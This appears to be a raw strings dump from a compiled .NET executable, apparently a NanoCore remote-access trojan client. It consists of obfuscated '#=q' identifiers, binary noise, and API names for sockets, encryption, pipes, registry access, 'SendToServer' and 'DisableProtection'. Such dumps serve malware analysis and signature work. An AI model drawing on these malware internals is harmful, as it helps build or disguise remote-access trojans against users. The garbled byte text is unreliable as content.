#=qulZN_JfMbEqc2jFbEooALI6mh8tLy9$3NFedHEXAIAw=
#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK
-'&
set_AutoFlush
jyJd
6iZZ:
#=qBcRYABJptno3$fpXoMXAvg==
CreateInstance
SetBuffer
#=qLYpbsprg$ymVLeNEwEpYlA==
1juC<eM
CreatePipe
&%(L
tZN@
Delegate
bgJI
AssemblyName
#=qSh9$w8INPkos7acCjV2yFw==
#=qkFwCVmJ2HhZ6r$uKeVZFFfVLdddj$WEInl9bSgbErDM=
#=qmzYu_D9f4dvUPauEaU7zvyNjCyGp_73Xn5SffrcfQAU=
#=qWljP9Wu9miiHAG26c_L7NQ==
ParameterInfo
d6
-'&~
@j`L`
#=q0f150kYsIx0s3raR3xq1xQ==
wn p
,%~B
#=qg61MaViIt3ErBjuA0N9Xrw==
get_Unicode
#=qhz4yMg0WDLwu3BJp4fYr0w==
`;Vo
<3X~
p|vV
_nZz
-*& r
TY
#=q9LcncGbDdZaeonfU3943IQ==
#=qJe4Aop6J2k_bK0f$hS3ZOQ==
AssemblyCompanyAttribute
#=q6odj$nz79NlWTFUK6$Vbrw==
-&~
J
)%(L
#=qDwymJFr9Z$8uhJ6g7so5xw==
#=qiJXCsKWBF9DB88uzW4b92A==
I}%uT)
PI3)
*J[vE
Enum
DebuggerDisplayAttribute
ParamArrayAttribute
w7Yf{
N:'t
3H:YA-W
IS~)
get_Day
. (A
Restart
GetTypes
ReadInt16
#=qJZLeQthAfpiCw0QvZb7htA==
#=qVIikDYmLtr_O$2vZcqLhHA==
^f?u
@kC:
*D<d
lOG.
#=q2JCFpXLqGkqf10Rox8zrAg==
psapi.dll
}f&%
get_Length
>R,Z
ProtocolType
Sleep
)%Gy
MaxValue
DESCryptoServiceProvider
#=qMMPHzLKw8_cOGV193acukw==
#=qsUdW_kbiEct8_uosknsYUQ==
/-+ +
#=qXIsqrB8Mw2TMQ5$s7oRSIQ==
#=qQoUfP$jAQrKMjDuqm54QmA==
#=qyxpfolLUhMvFTDE2h_syvQ==
-I&
-+&
LDd#
-7& E
#=qEnv9WsExz6baZJKRUDupw9eEQbgJVjj69NjcsJ7hrBk=
a)~M
-)&oN
Contains
, + +
fefefeffeXa
#=qRxR4aJg8TX8oM$OpeoviZQ==
9M'!
#=qsqmAgLqQh_pOiJq5Mcf5Ii66zl6iLnAX8VtqTy$uxhY=
#=qe99VPFgyNENK$KtARK_iPuwvOEw_NRgC00PdG55dmGA=
#=qN1bIi$08taNozgdgDWdXVA==
o"%rs
ValueType
System.CodeDom.Compiler
Ary'
GuidAttribute
#=q9rN$wEdl9rzJbAMMIiemCg==
B ,S
-&sA
#=qlIUFl2SBYSRov3A1WGimWQ==
'--W
xVl;
'UAY
#=qFm7s8q151MPpLODhzLizPw==
&w<^
ToLower
>+]79&
QWI
B0{I
PipeExists
#=qVEEdpD96A48uRzPJT7G_w60gIZo4tH1_e21GoRWPFm8=
get_Port
#=qxb6WVOMh6wjcZFY_Q0MJOQ==
get_Count
|O<X26
(hH
Trim
GetTempFileName
#=q752iy7NeRDzz3UAYRlXXfQ==
#=qikBX_CmS$ZzVAuq$nQJBDwmLm5Gee1iPlPuvI188Ejo=
#=qCaHpjtavBmCU_o5x0kJsKA==
#=q6ARXRSe2PbSpq5u4_c1Rsw==
#=qHJMw55fNEVIiKcc4ry0o7_L9hyz3vS4jgKl3KMX8xGg=
8_I3Y
=?,'l+
, ~s
L;j
SocketException
#=q3$9MQ9O56ldzMJGDeTdBZw==
"34c
#=qrJaovDbn6146mBrhFbUMbw==
ARv[
#=q$jOt_Qd3idEY2i2z8zIong==
#=q$yU7aYEYOl8Nz4sJLGQQ6w==
#=qM_mpCWjOCBlruGH_QcTQHocD7LUJCLuKe8ntf2VtQlk=
#=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=
#=qDH4GuNn5iW6RFhEPrfs$pQ==
P)m>*Y?<
#=qsUsGxFgC$BJaO_$VAtZ1Ug==
#=quXVzKqGldmgtXgVm61aLog==
8iKp
#=q8GRQigucU81Rfg9VpK7PVLcjulhhYVPijYKMm9N3PJs=
:YR|
]'J~
#=qstAyOBsDsJqFRKDvXIn01A==
*(Jh
w.<4
UInt32
f(
D 1
StartsWith
k8U zW
B7<+q
!\%
'#^\
get_Version
MyOp
set_CurrentDirectory
#=qvQfNpqhSbw_$p1TB3UFgJA==
`1e1$
"5a (MA
ToString
#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs=
?udzt
S[Y68
QAID
#=qWbDVCvJRlY$nWsVAToK13K8LD9gZFcJQAtBUvjDEcyo=
Utils
#=qbwvWShVSL8DgrXXfPQ9kNmpf6pmcj6q57bPfcsBp938=
]/?/
#=qZFVU$VkNPSWYii2AVQe6c6mwAUd10Tgqkl1$K5gZz9Y=
(Xp]Sy
#=qFYv4oSsEFno3Ujev9_o4Hg==
#=qGxD085Z3RQaUY4iGwWH$xgEmRYVWDAN6hxNjaXokfVc=
#=q1vWrLhskrN4OoWzxKuDDSQ==
TryParse
ReadString
6Xce|
-!& 4'
#=q1t2nN1p2nWkytA1wjQ32JyClWcTGIZMOEV9XOIYf1xQ=
E3yV'
add_UnhandledException
7!}_
#=qnB6QgyVNIUL$Uq0GD3p5d7LpaFZvHrB3jSqhv3o7qlE=
+(+
V&;(Ta
get_Hash
ClearProjectError
Ve~o?aH
#=qZiHVbt3FXowK6_NIyOxsOw==
#=qdPDxrK7XRQZlwY8QeW6oe0AEoOr3qND_WVi1o6l48tc=
aN&}
*Ko
#=qdwmMObmoGgv5eEpelZDrHiipw5mUgryufdcXXig375Q=
\@,sH
Yaa*&+
#=qCQ9vY8iVniiFr_C0wuoMFHQgjJIll0MjoDGXuPo1hYk=
DebuggerHiddenAttribute
get_UserName
#=q8FSwXWaEOgeGW7OlBosSfg==
z|fD
#=q_kGyEn8KrmBmt5M1N9cUSg==
Connected
ICryptoTransform
LeaveDebugMode
]>~u
UXMm
@yO{
b`*&+
mk@5+
PipeCreated
#=qkWUjAoA_6r2E7qo6NAGuIBq3iKikqBJbioTC25CcZQY=
AssemblyTitleAttribute
k;EK
;6$)S>
1)XQO
#=q$njopRrPblqe$yrs$rsu5Q==
~{n j '-
=s)
>*L
`n J
#=qJqkjp9g96yoxpNS2E$BC00FKleto7dZfN9N5mtLDF4g=
#=qd4_A7Y1qGQ8QAgHfK8_ssQ==
_4}gg
Rp<|
CompareString
1C(
@XGxS
#=qmbdg4P9$2ouafwS8nEs4lA==
System.Security.Cryptography
\9^%
X8\z(`
Create__Instance__
MemberInfo
]) tF%P
ConstructorInfo
} T=
aRLqL
k(W'%l
/>?f
Start
#=qjYgYU6Lnx_W1ikVtBmjm3w==
Combine
#=qukf_DyAYprvhLsdhT4CGuA==
-l&~s
r*+a ~a
#=qaPkEKJmdD7BgG18R0WsnHA==
+&{
#=qtcl57G6kPr7DDYeWeY389w==
Y/"
#=qChHxg92yH05lHO0u7UrDcPo$UK1nFXIjb2DI3pyR0FE=
#=qnonybcfG2jzQ4kHK5lGw3g==
e)G/R
#=qEIPcndOLrV2GJmno7zKtBA==
#=qtz1ayBjdbHAw$ecbWtEnYJXs5RBd798kqoBvIJunFxc=
add_Shown
3T$&
#=qCA$7lFkUlfYTBh0Hp6uY4w==
#=qVQoZlgR59_v4NYIa4CBPQw==
MgMOR
#=qlzCbqLxFuzycCPDZStFfAA==
'-sK0n
#=q8Bp27fhtrXMmonNxf$9qLbuQQehIBQTdOPDQw07FUyI=
get_CurrentDomain
Data
#=qgW$Sn0ALOASuZcEZHxiZDaj3mNXTljqLa5onSc7M0U0=
RegistryKey
#=q3p_D2U81K1hW2D54P32yDw==
GetFolderPath
#=qKaOsg8ghd7KyYDCm3RhDg9KJrf7McwaH92TdOJzSw6s=
v!fB
#0/$
~kSIo
feffefefe_-
ZRyR
ConnectAsync
Client
Int64
#=qoa807UEkAFejsz9ub3crU9Uahxxj5JIyAtKhnrEn$dU=
#=qwNkTTorgPauZQTT6jiqLIA==
==@S:
i?;~
)s5=
~:}ew`
fbN%
@f;\
AkW{](W
_} b
.ctor
oH
6ie<
#=qU_ZXXWlv_8PtJY9coDWiH8$dVbE9S$EoqFVRvxhPtE8=
d)Pa
, &os
#=qWszclzYrfU2ikD2Jo7BLiQ==
X^ x iu
mscoree.dll
CommonAcl
1uRl
a5lD
<D!K
CommonAce
#=qru2ORBLxmt_CUDya_FEQGA==
&DU{
#=qd7RJPnCy4YddvoQeTJhlwA==
#=qfPf03rjJVGFkLtYSr7zDRw==
#=qecBuZmXKFD$jZa5T0d0L1w==
NanoCore
#=qREZQml1AE$F8eb3teEaUmQ==
Z##m
>/S"
#=qr5qpvOPnLxLp6aGkfAM7wQ==
Invoke
xy}g
&+U+
#=q0U3u45cUl83Kicjfx0RmVA==
_7 +
Mmq~
#=qs4p7qYamgHyRCYZsTKM03Q==
#=quOBOxPeAl_kjKKx$REI6dA==
(
hR!Z
#=qRvcNy1bY28C6xYdCX8MF7w==
- &&
]\#i
O, !
#=qP5B75c4g32E_HsewCKc$Ig==
>xs#
#=qRxKU0X3UfYwXoOTtDpEVW6z4XRgE1s4V5zOQsfCCSqM=
jEj\7%
* 8|
#=qhRDMBTieg0MID1DJ88eKUA==
I&CO
9F|6&
!|y3
L4E,@
p!ON
yIM
r_;D
Kq>_
se9E
#=qgN8fDYnB$J$X9QGGYQsYuvA6BpDT4GE_ca7JiOh661Q=
#=qeMVJwq86lZc4hsNJNMQJVYiQqG94mfqhBGc9gH9UUgM=
PPP u
+,~^
#=qN6ip4UNq3TKArPG3ZZy$zw==
-4&{c
get_SocketError
-Tf?K3-
#=qkrqC_kLD0I$zOgfqD$aGaA==
Array
_\fU
#=qsY8nKQa1iMT2g$sVoLy8u9jrLGP9DMATpaFjFx3wjNU=
nHgf
#fOu>
#=qZbWC$V5YeersjeRitYkSUw==
!a==
mQQ7
, &8
\K_D[
#=qCeJ_QwVb__fbuEImkTXwSg==
#=qtussAh$DpHFmu7sm9TXJyZsrjeJ6Xm9c2y22v4wQG2s=
op_Subtraction
#=qOplsUBML8x2xteEBilOycw==
#=q$fGRvwQxjFKeY$SH10p0pyPTU$R77VMKr3CcLFQeQ2Y=
|HWp
#=qDJ0VTVPWfAWYghKX_DdnsQ==
'S4%
EntryExists
#=qvRKdouixzy3mopZ1VtjZRIxbtiSW2GAGLD$37iVLn9U=
&DX{Y
13tB}f$
AAj+e
#=q5W7RemVArrFCeEyFuvU4Hg==
,!+ +
WriteAllText
SpecialFolder
ngL99
Byte
get_Chars
#=qxp6ct4JGLaMDbwg6fkrIEw==
#=qovc0J7K6b9Eq_C0K46rbmg==
p=K%
x&yo,?_
MoveNext
vTr8
Y5^'
#=qwHAjqAoc2lT8vaebbsWerg==
get_MetadataToken
get_ExceptionObject
xtjg
#=qB8Wn1MJrSNWupWDx0sYcAQ==
#=qzB1OZ89gRpxcPckUn_afNY2d0beSpEyl40_4IarIxzM=
jI_;
F==
Cb`>5
Kr_^
System.Diagnostics
#=qh42qYul4hj$aa5mluadvLA==
iD=+
RegOpenKeyEx
l4IH\N
!I=7
#=qeXI2ChPq1TaKaY8cTwWe4uWAyXSGUqAWxM21uH$6gYc=
Jnw|c,
#=qnDc3CmkCB1QeN2dXbmqV1Q==
>pV
[|Z
,guq-
`d15
fB,|
):K
6_>
Ai$9S}
#=q9M64o5ghSlB001vxhTt2kVIQeNtcHtzTvRgoYr2$PVs=
0Lxa
MessageBox
`%,h}
`OO3
'Abd
9&cb
TimerCallback
S(
Q*'2
#=qi3LnKomYQ5KrkAbxbJpKCg==
kL@o
; o0!eXQr
#=q0REOJwjO1qsE01G_RQE1TQ==
z?qB5
)kvL
AddHostEntry
Mq #
^W"
]O#M
#=qzI8efPARogp2CZcGB2UtfAz2tJs0A4fM9fKvuTKYqi8=
#=qO4hvdkAW0_yOcwEk_VD$lw==
SendAsync
#=qDEcM8KorEdChS9luywSNQA==
#=qtT$P2Bo4VHFu60OU4VLf1H20c7M2DlURuyfb_XJDYaM=
Directory
#=q2V8VN1ZqnXOBhkZZr6w3VA==
ua ~U
|'\0
Uninstall
`}z
#=qFlfDskRbjMOXZPvSw2W2UA==
]BcH=
get_FullName
ConsoleApplicationBase
#=q1kCP32T3CbXwL6JS3UekkltOicB4KjO4W45iMQoNvNk=
#=qJrzYsTPKAwT$ubz_aq99mw==
Q`*(A
*fg42t
#=qu0EIqDRT_HlTe4PqaMKdozL1lQ0SgTtqFucuF2vFq50=
get_Item
ReadUInt64
#=qxQTn_t1ZFKKNm77mQ5vH9cInicm2Cv9jGtv9vmIpksI=
RegCloseKey
"56U
-2&~}
FileStream
#=qxe_BfLLMHqYa_KBeLsRfpw==
eFz!:B
Xcvx7)
9E4.
$%(L
EBgZ
-!&o/
ffefeeffefea(
#=qRUXz_3fP21juNHWjDYL16Q==
Fx>^
,$&s:
#=qxHMqkcY5ri8Rsxs7KCJ8ww==
set_CreateNoWindow
Y 8
Assembly
b,rq
[ h
ClientLoaderForm
#=qA$TQXn2i$KwpdqxTX6vvVw==
-3& (a
#=qfHad4tglpNfnMqZ6nFkPPA==
-,&~C
s1u+Y
Di |
<PC)rc
#=qgBCfMYp3J4fCYU13EId5uw==
+AmG
#=qZ8pysPk74rQ5GX0s5CkOJQ==
M0fPGK
/~J7
HaO#
IEV_M}
#=qwrVB2mw7gzmYRanSJvSoPg==
#=qK7tJUw5nsLE_rt2JHgqYI6_vH0s$mFFB1QifRuMCr34=
SocketAsyncOperation
iB]p
1^S$z
Dequeue
%kFG
_JXkYc
#=qafzQcMCK0eVSctI0IcD2PA==
#=qEQtWieYw8BPdEE4hbsjTLrq$BwGjJOBoaDYJmV9xVgE=
-&+
WindowsIdentity
#=qEbf5uxiH92v$7mL0TnmsnA==
#=q5OunwTi_tYTGCTkAtZ8rARxlhmXbFcAf_e1GiEt$FEA=
@IrJ
#=qsA8D04owIGYHILF6yPa43A==
a6F$
#=qzjMBSDJWeEdkUWCBxYatrQ==
Size
]WBC
-'&~C
CL-a
z3v
=VH
H T
WindowsBuiltInRole
#=qEqBb19ZxrWpMC8pwAc1v$Q==
#=qpNR_LpdLu_eSOZVgxbr8UFRlKjbiBX7LOuGAbGS07mXUJI3AAilu14uPN_kfaTpW
b'u
fefefeffeefa
#=qw9FR63zXVj$omVnwg0u37A==
#=qnY1InNbQmfgiJXdGVH6rvQ==
Q%A
#=q5WXECfTJPQIQ2JoJDGsf9pTFKCPzQGp3$QlyT_g_ZCY=
Void
#=q66hvvPDVbMv$MYStXtnb6Q==
32`K
#=qQR2R27CtTwLSuNC54_JY1g==
- &&*}b
a]+
#J,
- &~{
#=qpXfSNxR7J3tqOHyqT6s_Aw==
Resize
#=qP3lBpu0cs5q3Lf$qXSL7q6szA7E5M9NqMzkAFV6l4CI=
#=q1uJdtbJoEKhZjOld7SeHjw==
ra8%
W}9>
Clear
a2k.
#=qAySeqCaPs9tWWTa_P8M4Zg==
#=qeAvM9D2ZXEFg7Zo1J5PeVA==
YhF\
-EZF
3Y|(H
YxL!
#=qr6ouJTA2RwDm_3Z$eUP6TCvbpSA$yAFGnut7D4kG2$I=
dA.a.
Mk\E
B(
uyZP
GetCustomAttributes
R^U-
^]X)`1h
#=q6W8MK4LKkww2JvseikWqeA==
#=qnaTZqk95Z1a8JBLdKiF8aw==
- &&*}&
- &&*}(
IPHostEntry
Y %S
#=qqLNJOrQl$9SirTNF5ZKaLA==
#=qClMnNCTDhIIGUYHmdm$xCQ==
#=qYQagvH1k4NeWsCidwFRb$sQTZXPGouROQfmoImiPGDo=
+"
e E
_$,k2
ReadBlockData
9D.Tq
#=qOicuy1VnndMMXIrDqqx3EA==
XTdkp
$y
IClientDataHost
#=qIrsTmpVUMRgxokIHlpGfmLtKeqxo7vQsjSkKUKFpH4k=
aR,aM
#=qDx8yS5wU6EQSawGC841xnw==
oWWd
#=qJBJs_Q6YmbNTnGoWFx0s8w==
DeflateStream
IPAddress
M#4m7
Change
8UkP
ToLongDateString
~= p
#=qyMcWoZuG7jRWeztMnp6fPmxxmqfVgP7DLzGs7HeF4Mo=
YV= J
#=q4rZJEBSRFNm6PYOH7NOLUg==
#=q65znFg0_234nfnhL4I8yRSIMDpdjAosbzeDfyRZVW08=
#=qmuy0ee0GJl13ksvWRbOSbofOCTPf0dv0HYdjJq9H_Es=
#=q8SIEDcn4WoT9RcZmFK9tzQ==
Nd"&
O 9^(
}"AX
RuntimeCompatibilityAttribute
Kl2E0
a%'r
#=qP05CRmbt2pJg10eRU50wu1vx$mfteEn$pCn9SEbehP8=
FSF,
GetExecutingAssembly
#=qTKJrybVS3pgV4uZ4KNtp3g==
1@#z
#=qNQZrJgmZwpZh_4yrtaf9Gg==
#=q2X26s_rFZ25AY$hOcf_6zA==
S)@=
.Q[b
#=q0PMcXQJxcLLr1sYO0fpyhPjUwjQtInL_vJPQSgCsfio=
#=q8nWzev5go3NKhN5Gk9NzTmM91eKwrK00n3U6GWmH8Kc=
#=qXjNBjXFhVcOvrRAG8alfq96_gJ4jOa0wwNOaztY3QjLWnMT6wXGDzBnHuUkef5N0
Y +# S&
LE,j
#=qpXMe_UDgWsOaRVi$02jxzg==
rau3
'Yg%
#=qXkgpfghvTKDZGlXBGI4x9veQO4JfjF7GW2ECw9$L3EvyKZGOnziwXE2Xr1EkpRwe
#=qb0tmyILenEyH_R9DXJFwB5rGNfkKkR0Y5sGtBRsV3YE=
(a>&
dnsapi.dll
#=qCSC3Khfzx9$ef45TjPThpcJgh1Y2yjEovdFzCbywzqU=
#=qGWcF1$SkVAOkK9Bjc82XDg==
ArgumentException
7xj/
-/&~J
&2KA
#=qfsxP7vyadqL93mAkiQXr1tsUC0B$7Gp0ZNAPpjNxIG0=
MyGroupCollectionAttribute
~}
#=qy_aVo5ze7CCnCYXCQvhVBg==
~s
#=qCSH0DtnYKogitTpLw_M85GR1jr6BVuF$16hm8cfUYWw=
9!BO
#=qhPT6K66KztLE5cE8YZMEsw==
#=qmLTtz8OEDrkzFTzYkI_Dg1dvKwiGw9blNcZSU_QqMsg=
&)^)
ConnectDone
#=qbn24Ox5i732BM_T_R4Q3RtK1pEoSIYmxE9Rba9DDKEA=
MessageBoxOptions
#=qhwyNa_lhtuoyuJK5j3BcF4xu5fY5XhFlgzkM1Cgy6IA=
w{
G3feffefefe
#=qA5pFz5LZPgfUa5zon4beRA==
ReadBytes
%<0G
v=/
#=qjAD5jc_8Kg9x$NoAqFAvpA==
9gzC
Interlocked
#=qGCYL9FviWCrv0prWZC8VfgL34V_6XyB$buFX2LkjbCg=
#=qwVGSEK8LoRuNWEOYfq8$hq39mmxHzM3pIeoRef7XNt8=
u>c9H
-Z!N
GetCurrent
SendToServer
feffefefeY
#=qrYH2MBQ1J6Wu3hhoHHVW0JQwxTYC8hYBTLbQIYHNBds=
e>[N
AssemblyCopyrightAttribute
#=qKqE6jaRKu5jJvHl8RwywXQDv4h_f2ISEaHK__Drdd$M=
#=qnOTCmwQWr6BtiNf9ta8BJg==
~,
#=q$sTc1AZMnHRC7q_PL2hWs4JIEJoo88_IAFcWtrdNt$4=
#=qrzlCozsOJIqLxGzoulKftCL7kUWSuMYFdc1ca_yCcBA=
, &&
#=qcMb6hxBpdyTwCjvpzaQcC5dS3wbplPqOta7ERz_lMIo=
/HM
get_IsDisposed
ClosePipe
a/'15
#=qVl3h61LTPSW_ew_st_OlTAm7x_6Xu4hQK$pi2fSiEIs=
#=qYfWGXuhZd0cmWjiCvW2EPw==
;L9q
%'lfc
ClientPlugin
FCDC
RkWc
#=qK$702nkzQ4rQ0lJLQZ2zaw==
Operators
-&(a
pQ~xX!
8B,w
#=q1r$Sd9Acbw6KsKv_F9uYTPvvGAfiEwUnai9OGYAUQBg=
#=qRxyF5FV01AHvUkR3BeX8OA==
#=qAoRzrFi9HiHjyPL0ixkVXA==
DeleteFile
#=qOR7qPTYp9qHTyadzUKgUYg==
P .
-&&s9
,1KvZC
#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q
l^h;
fES)
#=qIe49uN8SyHwjwKdv9N2r$A==
#=qO7YVPb8fjfyGw81pHcJjnw==
LingerOption
e*&g
!`pv
7=~<
#=q3S7bY847GmpPliI1m7tZaAVifJNdeHclZJyeY2JTxN8=
gx#`:
}|,y:
IndexOf
#=qSJAMGBE37IZjr90jS4_MYNWNa1$s8PXhOErbnAhK_ZI=
#=qwyLCYYp4MoTtTA6T$fEOIg==
#=qpQiSeXaCc6qGNX49vDbcMYyzv_UpV$YoUyrH0l6FW6Q=
5rrj
hXWW
Close
:~V4,
0T12
4W$bi
&+`+
3^Cjp
l Lx
B&*
#=qYhk_OkZkBWola80M6EUqow==
IClientReadOnlyNameObjectCollection
unw0
#=qQkx1bBZns8hPde7$PcvfUl2fAairj6t_H8ve7nJO2s3BIB3t7PXd4ZR9h0JHyxrX
#=qEn9Mtg$AIqWbq3whj1y5N12e3KXi_NwIIcl2i$FXNSk=
~)?
#=qZvjD49iuetyLKBIiF$ZmjA==
#=q_$JrmDHg2uq9s8cQVRi8Jw==
Read
#=qTSoRMaNGYiiBNK9Yfq59T$2z3sNScYh9uxoeWlhnD_A=
$ v#
kS8qErg]
#=qdupfYLPCEHNi$xwR52i0Lw==
9_#
-O&~r
Delete
value__
fGd~
`:JMA
/ B
#=q6Xi08r0$lOOnXtoBHhfMuQ==
get_Value
#=qrQRxQdT4MC1qfwOd4n14uA==
#=qJRbhy7_BbunS1O6hH3MqZIufpnZboV6cb5Cv4qZI1D0=
#9/:
B<. 2
sj&
#=qmTxGiMA05lTEtoPPV6RFOih4DYS0uxrxPO4vA1H2j6U=
p;(W
@e5{1SS/
AddRange
H|m?
Decrement
SocketType
^t2n
#=qLSPQZXlXixhGX8Gd10$ph8j0p3_XdW2xwrfqz3nO7MY=
*}r~
DiscretionaryAcl
;?Tpv
^AR
CqpR
ConnectionFailed
CLSCompliantAttribute
?IMl
.cctor
AsyncCallback
#=q3eIsVMg85$T5I_yeach_tN$TJG7$vFUaeExZx7tMHps=
p~laMp
#=qquFMi5Wa$w8aN9GGlN4H1Q==
mscorlib
d~%yw
#=qyzEuYsQ6u9hwZeR0HeWqvA==
46/l
J+I0
FileMode
Bs8.
#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct
V'JV
#=qd92UVUgmlXoQZdJDkVvBpfqQ5IrxjaeWORyWFC422PQ=
PluginUninstalling
#=qVxXNKnhAcArgJoGGYXiyyQ==
l9ZO
GetMethod
1 q=
#=q7Tql80HUgCLaL3e0n4j7ew==
~PE!
GetObjectValue
#=qiIt1yNcUYn9ksB4loCZmUQ==
#=qN76bQl1CQ6EpIJzS4bbSnw==
ZYm{`M
o&`G
#=qGjp0Vb6efONwANkcKrMTkIBxJvr9AleFfJriudyTw3c=
L+cXu
8,jQ
bVa?
M['W
8+JCp
#=qEoM$dAPD9j9L1YOZU2B97iwm0vZOJe13LDB3GayWQEo=
#=qp9IgcHwNxIVh4GZl4S2tcJtSz0NII67aXwFNDcdhP63JHe9MNg0kPsAos3IUd98k
#=qFY80y4KcMQywRNP$ttVIXw==
AllocConsole
n\eD
F8f]}
+K +
Guid
v&YD
c<:4
#=qvJN63xerlaB42Q0XUG621g==
#=qfLFZgbR_r0GETPSprP6O9w==
#=qA1_qolTI9aVdwnEde3ubqM6zKBigTZiyb5_iHpeZQDI=
Disconnect
A<NZ
i#'E
None
get_Width
57u](
Q Sh
-!&
-!&&
&f@{4
ContainsKey
System.Reflection
\_[
#=q5bws5LlHvLK62TcSJadQTw==
!W'm.
UHZwv
v(
PU F
ffeeffefeXa*&+
\r.c
RuntimeTypeHandle
#=qP9qYgJs5_O2GP2pI$ho4ZSa8wQkwNQEBMg8VjNRrUWE=
#=qxWp4ETQRrgcfPChnmxhivyMmb5p6MuyluC9Tc_Mhkec=
j(D]
#=qui$hq6ka6v3VYA7sCjpJmcmNECKESf33DUzrmeSOmg8_E_GsgWi7VMMVWUGuO5wH
#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8
t2C\
Jdf
z%(L
#=qL_Q_RdUm_wJ7VeVwUqRXbA==
@EC{{
#=qObBSq08BLhHK8B6pYQSLOw==
#=qhiSO75CpxncaWptyc0vAMQ==
UInt64
8HqT
4I&^
~Zqy
ToInt64
Fy
oB
#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq
IPEndPoint
#=qmiBgFZvSMQ4WgT0UQIJlEGkYZhWP0gsBGd1anIAH4so=
0B)
qe' 4
XLm&K
#=qq_SehjaC_F9U66vu1NLqjA==
set_ShowInTaskbar
#=q9lvTmS27dN6FAh4mbOnRsQ==
Rfc2898DeriveBytes
oDxa
op_Equality
Bss]_
<%B;.
|t4
#=qw2XWrJCQCyTO0Iwdbz8TWw==
#=qxH0vEx09STdEljqb$W1E7jvc94T2TeZBAEeRdiG1_PA=
aoo >dU
TfX]{.
L)cT
#=qO0bmWYqIZnaB7Udo1OTvUuiP36Q9Z_7hz6URm1Yr1hM=
#=q_0gCRmXint4znUKVJR_bzg==
33!<
#=qQ9gevS7b4oTsdxtV36c3$A==
.%(L
V!<|
#=qAzhW8LcEnUCELlhG4klMCnw00GcHco1N61RthSA9zQU=
xQ[9
#=q85afbI_HcqBFOZnC0iAqsNghLb3LsuyjFtpLEYYoPX8=
#=qh9KSqT0kHBFSDanZ7gXkKb1vdDfzZS3JIRcUnMfcljE=
p_}T]
NanoCore Client
NewGuid
get_ClientSettings
AssemblyDescriptionAttribute
tN v
#=qW1UvUJT2hH$HRJ6kt_DhXQ==
#=qUzL7S_0eXIkbwTon4AS_WA==
#=q5C_es0qgtlVCNxzfPQ_idg==
Z&Ml
#=qeADSRAqxC2FlJbA5Uc5$2A==
CEIOF
}z2
fefeffefeef
IClientNetworkHost
1]@]
#=qa9HOmSrK7mjt1ZxVRncCgFoJUA6N3DmB1Rc$YUfcSKM=
,|Y>
iWXU!k
#=qe5qrWacQXGv9g0P5D_mRuQ==
#=q5grPwgEurSn6KutVLS5_oPClPR_aCEdSRk5nKP5bDm4=
]m9E*
%@eU
#=qLEtx_37WeiIPQPYSN8vY0qTNiL_L6nA6vkFQwNlcU2Y=
#=qKKh2V4W51UBGXR09J__pug==
k@Tj?
|IkP
e4Bta
#=q8fYxP$_i6Xk0$6OlSwUHKcvhrevHxLXqXqvszBe9OtM=
uDyr
P d
":F~*
GetResourceString
-7&s
#=qN9Enun6Rlq30xNdBjhzY0A==
ValidateSource
#=q97ilq24aAenhk$hG8MzEMQ==
#=qikOQWBxvreUKIkKm4o4DoA==
#=qc7QknLi4DrEENw9hVJyfaw==
#=qBhG6LJNfmJspOR5A5YrkZB3a_dWOpJYSj4Mo9vfL8qo=
B~-X4
ConnectionStateChanged
#=q1Ld$ycQpy0q1QvYRFk1k5lwgysKVR2tJyNFjakVtbYY=
#=qoTNlk$Wngv$bqPRyj4mJig==
A\fo2~
#=qsWAbPBa1yptbB97zoAjeSA==
vYDP+
1Lc;
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
, ~?
#=q7wsNZ$btlm7uRzkYXMkJl8JrBCKSYJt4if2WiKQrObs=
C$,wyM_
+ +
\<+Mk7
/ or
NanoCore.ClientPlugin
#=qSLl9utb6ViD7fbZHSox8oSv7PZDBMO5b6MBr_gzzHF8=
#=qtNbB44E34Ui_i5yJYQ5ntw==
-+
#=q$c3lXLbhl3Qzil6Z9hYEopCTRdsG8WE_1ZuhF2KQELQ=
#=qu1CivWngdicjZHEJYKM3dA==
z1)RO
*%(L
#=qenWi8guqQrvoGB55djo0ka_844yTmViBn5_Fr2X6HAceO7AJErk_Rh7nfkfqtUbq
Variables
get_Message
!This program cannot be run in DOS mode. $
* +
System.IO.Compression
File
IsInRole
get_Offset
GenericSecurityDescriptor
mj{(ua"9SH
Dispose
SA@AoXXDb
#=qx4AWw22LafncEy7CESjbGQ==
#=qwTOYF_qEkI0dXowKJYtI6A==
GetHashCode
#=q5uvtKo7rLfT5wGY5TBS4ixmbpGEL_B71rwbORlBpBKA=
ex"{
N]4)
!~v~
<-'o4
#=qFNeaOBvMHuebCbgh$0IKkw==
GetCurrentProcess
-,& oy
ad8@!
#=qudwGeEjJDUB9pt$_k0YOgc30ZWMo1bIGmdknk40OWog=
[:qa
#=qWgd5i$rED0nEbfExDCteKBL09U6dKm2BW1AXqZVXCWk=
.(?{
#=qnoPzE9XMA8S7X5JX6ycJ7w==
#=qB7XWHK8gygwSs$Fj70FiWw==
#=qDBRodZmvuO0qLafxHA9KMQ==
0K5#
#=q3d9CqFPpPy$rBhZvyFIRs_ElAFMHTo4ZZuE_g$Nfrnk=
Ik}ce
DpE
AppendLine
#=qOgNXWEIS3IQJCnff_sTmrA==
#=qnIGrpAn2e$qTqbA22$ONbQ==
]jAn
#=qfoMVJHfk0BnMs4x6mHO77Q==
- ~@
#=q6NenfQbzQYLSZe2oYrhKsEGeaR69wF$W7VvfZPx7lyg=
cha*>
eEYP
#=qbbzTfwYbEfmovMRrVY462ipA8X_tt3oO3M_wSSE0I_A=
get_Key
#=q2Sd$5fx_doPt8h$UdBacAA==
,~[
nQ$c
)V~^
j*&>
e gC
]~r
J G
#=q23tIFHA2cbwzlg6YDYhwLkXCJGgIhllZCGmc4pRC8rI=
DisableProtection
a)U]0
